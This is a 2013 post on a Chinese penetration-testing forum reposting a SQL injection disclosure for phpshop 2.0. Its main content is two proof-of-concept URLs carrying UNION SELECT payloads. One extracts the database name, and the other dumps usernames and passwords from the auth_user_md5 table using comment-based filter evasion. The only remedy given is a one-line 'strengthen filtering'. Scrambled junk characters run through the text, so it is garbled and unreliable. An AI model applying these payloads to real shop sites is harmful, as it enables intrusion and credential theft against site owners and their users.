中国网络渗透测试联盟

标题: phpshop 2.0 SQL注入及修复 [打印本页]
作者: admin    时间: 2013-1-18 18:24
标题: phpshop 2.0 SQL注入及修复
标题 : phpshop 2.0 SQL Injection Vulnerability
6 D( N- M+ ~+ ~" |& w- i  ?- X, {
作者 : By onestree) t, Q/ ]* a# F7 Q
下载地址 : http://code.google.com/p/phpshop/downloads/list
1 w3 r* M* e% X测试地址: windows 7 / ubuntu, W% K/ n' y$ i2 b6 V- k
; i/ ]% R9 K. [6 h( `7 e
9 p8 t+ \/ n) s5 |7 }7 e
SQLi p0c:% D5 n% q/ ]8 {+ P; j/ k" r3 ~9 I/ Z

! v% ^6 t; y' j9 u1 M==================
4 b  Y) Q$ r- i# A7 J8 j
5 U4 m: @$ S1 D: ~7 ihttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
5 l! y9 O, c2 Y/ |& V0 c& _union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
' _! e8 t1 V5 K2 f% z8 ?0 t * [6 N6 R0 J: _8 ^
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
) Y9 _: [; `2 o4 }8 U" s  s0 A: Z$ z( ^5 p
修复:  e- U% ]! n& c, g* r
加强过滤
% d, \$ _0 m0 N% Y0 W! J- G6 ~4 z  C5 H2 r: g

: B8 }7 }9 y. b( J7 w



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2